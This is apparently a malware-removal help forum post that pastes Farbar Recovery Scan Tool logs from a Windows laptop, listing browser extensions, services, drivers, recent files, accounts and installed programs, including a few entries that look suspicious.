FF Plugin HKU\S-1-5-21-3654736093-338424075-1572945638-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\J. Powers\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-04-27] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3654736093-338424075-1572945638-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2014-12-23]
FF Extension: Set Search Settings - C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\Extensions\{9b7d4705-916e-4168-b535-1f5315e44b47} [2015-06-17]
FF Extension: Adblock Edge - C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Profiles\r7t3wel5.default-1419397623955\Extensions\{fe272bd1-5f76-4ea4-8501-a05d35d823fc}.xpi [2015-01-01]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-07-04]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor [2014-03-22]
FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2012-10-31]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-30]
FF HKU\S-1-5-21-3654736093-338424075-1572945638-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR Profile: C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Adblock Plus) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-06]
CHR Extension: (SiteAdvisor) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-02-24]
CHR Extension: (Bookmark Manager) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\gmlllbghnfkpflemihljekbapjopfjik [2015-07-14]
CHR Extension: (No Name) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihokndmjeombjojnfkmapfnjeghjohim [2015-07-14]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Skype Click to Call) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-02-24]
CHR Extension: (Google Wallet) - C:\Users\J. Powers\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-24]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-07-17]
CHR HKLM\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3654736093-338424075-1572945638-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-07-17]
CHR HKLM-x32\...\Chrome\Extension: [ihokndmjeombjojnfkmapfnjeghjohim] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-05-01]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASUS InstantOn; C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe [277120 2012-02-16] (ASUS)
R2 AsusUacSvc; C:\Program Files\Asus\Rotation Desktop for G Series\AsusUacSvc.exe [113840 2011-03-27] () [File not signed]
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2011-12-29] (Atheros Commnucations) [File not signed]
S3 BRSptStub; C:\ProgramData\BitRaider\BRSptStub.exe [363208 2015-03-24] (BitRaider, LLC)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-19] (Microsoft Corporation)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [237864 2015-02-28] (EasyAntiCheat Ltd)
R2 EpsonBidirectionalService; C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSVC.exe [94208 2006-12-19] (SEIKO EPSON CORPORATION) [File not signed]
R2 FanChkService; C:\Program Files (x86)\ASUS\ASUS Fan Filter Checker\FanChkSrv.exe [45696 2012-01-20] (ASUSTek Computer Inc.)
S2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2015-03-12] (Hi-Rez Studios) [File not signed]
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-02-21] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-21] (Intel Corporation)
R2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [754280 2015-05-13] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.495.0\McCSPServiceHost.exe [207344 2015-06-04] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [609592 2015-05-05] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-04-08] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [373704 2015-05-14] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-04-08] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-05-06] (McAfee, Inc.)
S3 npggsvc; C:\Windows\SysWOW64\GameMon.des [4145600 2012-06-20] (INCA Internet Co., Ltd.)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15125280 2013-11-08] (NVIDIA Corporation)
R2 RzWizardService; C:\Program Files (x86)\Razer\RzWizard\RzWizardService.exe [367616 2014-10-19] (Razer Inc.) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [27760 2012-03-22] (VIA Technologies, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [613760 2012-10-29] (Wacom Technology, Corp.)
R2 ZAtheros Bt&Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [158880 2011-12-29] (Atheros) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 AiCharger; C:\Windows\SysWOW64\DRIVERS\AiCharger.sys [17152 2012-02-29] (ASUSTek Computer Inc.)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-04-08] (McAfee, Inc.)
S3 CM2793; C:\Windows\System32\DRIVERS\CM2793.sys [14840 2010-09-17] ()
S3 CM2793; C:\Windows\SysWOW64\DRIVERS\CM2793.sys [12280 2010-09-17] ()
S3 ElgatoGC658Y; C:\Windows\System32\Drivers\ElgatoGC658.sys [50288 2012-11-12] (UB658)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [198448 2015-04-27] (McAfee, Inc.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-19] ( )
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv_x64.sys [44928 2012-10-10] (ManyCam LLC)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [28160 2013-01-30] (ManyCam LLC)
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-05-08] (McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [402888 2015-04-08] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [338272 2015-04-08] (McAfee, Inc.)
R0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-04-08] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-04-08] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864200 2015-04-08] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [483240 2015-03-26] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-03-26] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [335944 2015-04-08] (McAfee, Inc.)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-27] (NVIDIA Corporation)
S3 S3XXx64; C:\Windows\System32\DRIVERS\S3XXx64.sys [73856 2015-02-17] (Identiv)
R3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-01-25] (Synaptics Incorporated)
S3 SzCCID; C:\Windows\System32\DRIVERS\SzCCID.sys [37888 2010-05-14] (Generic)
S3 BRDriver64_1_3_3_E02B25FC; \??\C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRDriver64.sys [X]
S1 csfd_1_10_0_17; system32\drivers\csfd_1_10_0_17.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-17 18:02 - 2015-07-17 18:04 - 00037523 _____ C:\Users\J. Powers\Downloads\FRST.txt
2015-07-17 18:02 - 2015-07-17 18:03 - 00000000 ____D C:\FRST
2015-07-17 18:02 - 2015-07-17 18:02 - 02133504 _____ (Farbar) C:\Users\J. Powers\Downloads\FRST64.exe
2015-07-17 17:20 - 2015-07-17 17:20 - 00000802 _____ C:\blitzblank.log
2015-07-17 17:17 - 2015-07-17 17:17 - 01153912 _____ (Emsi Software GmbH) C:\Users\J. Powers\Downloads\BlitzBlank.exe
2015-07-17 17:08 - 2015-07-17 17:08 - 01943800 _____ (Bleeping Computer, LLC) C:\Users\J. Powers\Downloads\iExplore.exe
2015-07-17 17:08 - 2015-07-17 17:08 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\J. Powers\Downloads\iExplore64.exe
2015-07-16 20:30 - 2015-07-16 20:30 - 00000122 _____ C:\Users\J. Powers\Desktop\Skyforge My.com.url
2015-07-16 20:30 - 2015-07-16 20:30 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\My.com
2015-07-16 19:49 - 2015-07-16 19:49 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2015-07-16 19:13 - 2015-07-17 17:14 - 00003542 _____ C:\Users\J. Powers\Desktop\Rkill.txt
2015-07-16 18:11 - 2015-07-16 18:16 - 00000000 ____D C:\AdwCleaner
2015-07-16 17:58 - 2015-07-16 19:37 - 00000000 ____D C:\MyGames
2015-07-16 17:57 - 2015-07-17 16:33 - 00000000 ____D C:\Users\J. Powers\AppData\Local\MyComGames
2015-07-14 16:59 - 2015-07-14 16:59 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-07-14 16:57 - 2015-07-14 16:57 - 00562784 _____ (Oracle Corporation) C:\Users\J. Powers\Downloads\jxpiinstall(1).exe
2015-07-12 19:59 - 2015-07-12 19:59 - 00000222 _____ C:\Users\J. Powers\Desktop\ARK Survival Evolved.url
2015-07-11 12:13 - 2015-07-11 12:13 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\TheBannerSaga
2015-07-11 08:11 - 2015-07-11 08:11 - 00000222 _____ C:\Users\J. Powers\Desktop\The Banner Saga.url
2015-06-29 19:54 - 2015-06-29 19:54 - 00347816 _____ (Microsoft Corporation) C:\Users\J. Powers\Downloads\MicrosoftFixit.AudioRecording.RNP.Run.exe
2015-06-27 21:45 - 2015-05-08 01:42 - 00076064 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\McPvDrv.sys
2015-06-27 21:44 - 2015-04-27 08:02 - 00198448 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2015-06-27 21:42 - 2015-06-27 21:42 - 00003064 _____ C:\Windows\System32\Tasks\McAfeeLogon
2015-06-27 19:13 - 2015-06-27 19:13 - 00000000 ____H C:\Users\J. Powers\AppData\Local\BIT844E.tmp
2015-06-27 19:02 - 2015-06-27 19:02 - 00000000 _____ C:\Users\J. Powers\AppData\Local\{06E1A57F-8411-4354-B732-E6CA0DAC789D}
2015-06-22 21:17 - 2015-06-22 21:17 - 00000000 ____D C:\Windows\system32\McAfee File Lock
2015-06-22 12:28 - 2015-06-22 12:28 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\ooVoo Details
2015-06-22 12:27 - 2015-06-22 12:27 - 00001859 _____ C:\Users\Public\Desktop\ooVoo.lnk
2015-06-22 12:27 - 2015-06-22 12:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ooVoo
2015-06-22 12:27 - 2015-06-22 12:27 - 00000000 ____D C:\Program Files (x86)\ooVoo
2015-06-22 12:26 - 2015-06-22 12:26 - 02388000 _____ (ooVoo LLC) C:\Users\J. Powers\Downloads\ooVooSetup.exe
2015-06-21 16:45 - 2015-06-21 16:45 - 00000222 _____ C:\Users\J. Powers\Desktop\Sunless Sea.url
2015-06-19 22:41 - 2015-06-19 22:41 - 821670783 _____ C:\Windows\MEMORY.DMP
2015-06-19 22:41 - 2015-06-19 22:41 - 00291584 _____ C:\Windows\Minidump\061915-43649-01.dmp
2015-06-19 22:41 - 2015-06-19 22:41 - 00000000 ____D C:\Windows\Minidump
2015-06-17 23:32 - 2015-06-27 20:03 - 00000135 _____ C:\Users\J. Powers\AppData\Roaming\WB.CFG
2015-06-17 16:03 - 2015-07-17 18:03 - 00000312 _____ C:\Windows\Tasks\Run_dregol.job
2015-06-17 16:03 - 2015-07-17 16:34 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Run_dregol
2015-06-17 16:03 - 2015-07-17 16:34 - 00000000 ____D C:\Program Files (x86)\Run_Dregol
2015-06-17 16:03 - 2015-06-17 16:03 - 00003256 _____ C:\Windows\System32\Tasks\Run_dregol
2015-06-17 14:55 - 2015-06-17 14:55 - 00000017 _____ C:\Users\J. Powers\AppData\Local\si
2015-06-17 14:21 - 2015-06-29 21:48 - 00000000 ____D C:\Users\J. Powers\AppData\Local\Chromium
2015-06-17 14:21 - 2015-06-17 16:20 - 00000981 _____ C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\iPadian.lnk
2015-06-17 14:20 - 2015-06-17 16:30 - 00000000 ____D C:\Program Files (x86)\iPadian

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-17 17:58 - 2012-08-30 21:00 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Skype
2015-07-17 17:52 - 2012-08-01 08:56 - 01067455 _____ C:\Windows\WindowsUpdate.log
2015-07-17 17:35 - 2009-07-13 18:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-17 17:35 - 2009-07-13 18:45 - 00018736 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-17 17:31 - 2014-03-22 19:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2015-07-17 17:29 - 2014-03-22 19:56 - 00000000 __RSD C:\Users\J. Powers\Documents\McAfee Vaults
2015-07-17 17:24 - 2014-11-29 19:55 - 00009132 _____ C:\Windows\setupact.log
2015-07-17 17:23 - 2012-11-25 11:20 - 00000000 ____D C:\ProgramData\Kodak
2015-07-17 17:23 - 2012-08-01 11:28 - 00000380 _____ C:\Users\J. Powers\AppData\Roaming\sp_data.sys
2015-07-17 17:22 - 2012-08-30 21:21 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-17 17:22 - 2012-08-01 09:01 - 00000828 _____ C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job
2015-07-17 17:22 - 2012-02-17 21:03 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-17 17:21 - 2015-02-24 20:08 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d.job
2015-07-17 17:21 - 2012-08-01 08:58 - 00000000 ____D C:\ProgramData\NVIDIA
2015-07-17 17:21 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-17 17:20 - 2014-12-02 19:38 - 00053630 _____ C:\Windows\PFRO.log
2015-07-17 17:19 - 2012-08-30 21:07 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-17 17:15 - 2015-02-24 20:08 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d
2015-07-17 17:15 - 2012-02-17 21:03 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-17 17:15 - 2012-02-17 21:03 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-17 16:51 - 2014-11-06 16:21 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-17 16:49 - 2014-12-26 09:07 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2015-07-17 16:36 - 2012-08-01 12:25 - 00000000 ____D C:\Users\J. Powers
2015-07-17 16:34 - 2015-06-02 12:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-07-17 16:34 - 2015-04-04 08:50 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-07-17 16:34 - 2015-04-04 08:50 - 00000000 ___SD C:\Windows\system32\GWX
2015-07-17 16:34 - 2014-12-12 14:47 - 00000000 ____D C:\Windows\system32\appraiser
2015-07-17 16:34 - 2014-05-10 03:00 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-07-17 16:34 - 2013-11-16 20:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2015-07-17 16:34 - 2013-07-13 02:35 - 00000000 ____D C:\Program Files (x86)\Steam
2015-07-17 16:34 - 2013-02-28 04:56 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-17 16:34 - 2013-02-09 17:19 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-07-17 16:34 - 2012-08-30 22:58 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-17 16:34 - 2012-08-01 09:09 - 00000000 ____D C:\ProgramData\P4G
2015-07-17 16:34 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-07-17 16:34 - 2009-07-13 17:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-07-17 16:33 - 2013-09-08 21:18 - 00000000 ____D C:\Program Files (x86)\Java
2015-07-17 16:33 - 2013-08-24 22:24 - 00000000 ____D C:\Program Files (x86)\LyricSing
2015-07-17 16:33 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\registration
2015-07-17 16:31 - 2013-11-16 20:21 - 00000000 ____D C:\ProgramData\Oracle
2015-07-17 16:31 - 2012-08-30 21:00 - 00000000 ____D C:\ProgramData\Skype
2015-07-16 19:42 - 2012-09-01 15:45 - 00000000 ____D C:\Users\J. Powers\AppData\Local\CrashDumps
2015-07-14 19:39 - 2012-08-01 09:01 - 00000830 _____ C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job
2015-07-14 18:46 - 2012-08-30 21:07 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 17:19 - 2012-08-30 21:07 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 17:19 - 2012-08-30 21:07 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-12 19:59 - 2013-07-13 02:55 - 00000000 ____D C:\Users\J. Powers\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-07-08 14:37 - 2012-10-29 13:28 - 00000000 ____D C:\Users\J. Powers\AppData\Local\Adobe
2015-06-27 21:45 - 2012-08-30 21:21 - 00000000 ____D C:\Program Files\Common Files\McAfee
2015-06-27 19:03 - 2009-07-13 19:13 - 00782470 _____ C:\Windows\system32\PerfStringBackup.INI
2015-06-24 01:31 - 2013-04-16 18:32 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-06-17 16:03 - 2012-08-30 22:58 - 00001132 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk

==================== Files in the root of some directories =======

2013-02-16 16:43 - 2013-02-16 16:43 - 0000132 _____ () C:\Users\J. Powers\AppData\Roaming\Adobe BMP Format CS5 Prefs
2012-08-01 11:28 - 2015-07-17 17:23 - 0000380 _____ () C:\Users\J. Powers\AppData\Roaming\sp_data.sys
2015-06-17 23:32 - 2015-06-27 20:03 - 0000135 _____ () C:\Users\J. Powers\AppData\Roaming\WB.CFG
2015-06-27 19:13 - 2015-06-27 19:13 - 0000000 ____H () C:\Users\J. Powers\AppData\Local\BIT844E.tmp
2015-06-17 14:55 - 2015-06-17 14:55 - 0000017 _____ () C:\Users\J. Powers\AppData\Local\si
2015-06-27 19:02 - 2015-06-27 19:02 - 0000000 _____ () C:\Users\J. Powers\AppData\Local\{06E1A57F-8411-4354-B732-E6CA0DAC789D}
2015-05-14 18:06 - 2015-05-14 18:06 - 0000231 _____ () C:\ProgramData\HirezPipeError.txt
2013-04-14 16:10 - 2013-04-14 19:05 - 0000774 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2012-08-01 09:14 - 2012-08-01 09:14 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2012-08-01 09:13 - 2012-08-01 09:13 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2012-08-01 09:13 - 2012-08-01 09:13 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log

Some files in TEMP:
====================
C:\Users\J. Powers\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\J. Powers\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\J. Powers\AppData\Local\Temp\SkypeSetup.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-06-05 09:39

==================== End of log ============================

 

[Domo124]

And the addition:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:13-07-2015
Ran by J. Powers at 2015-07-17 18:04:45
Running from C:\Users\J. Powers\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3654736093-338424075-1572945638-500 - Administrator - Disabled)
Guest (S-1-5-21-3654736093-338424075-1572945638-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3654736093-338424075-1572945638-1003 - Limited - Enabled)
J. Powers (S-1-5-21-3654736093-338424075-1572945638-1002 - Administrator - Enabled) => C:\Users\J. Powers
UpdatusUser (S-1-5-21-3654736093-338424075-1572945638-1000 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.3.9120 - Adobe Systems Inc.)
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.0.0.400 - Adobe Systems Incorporated)
Adobe Creative Suite 5 Master Collection (HKLM-x32\...\{288DB08D-0708-4A94-B055-55B99E39EB62}) (Version: 5.0 - Adobe Systems Incorporated)
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
aioscnnr (x32 Version: 7.6.13.10 - Your Company Name) Hidden
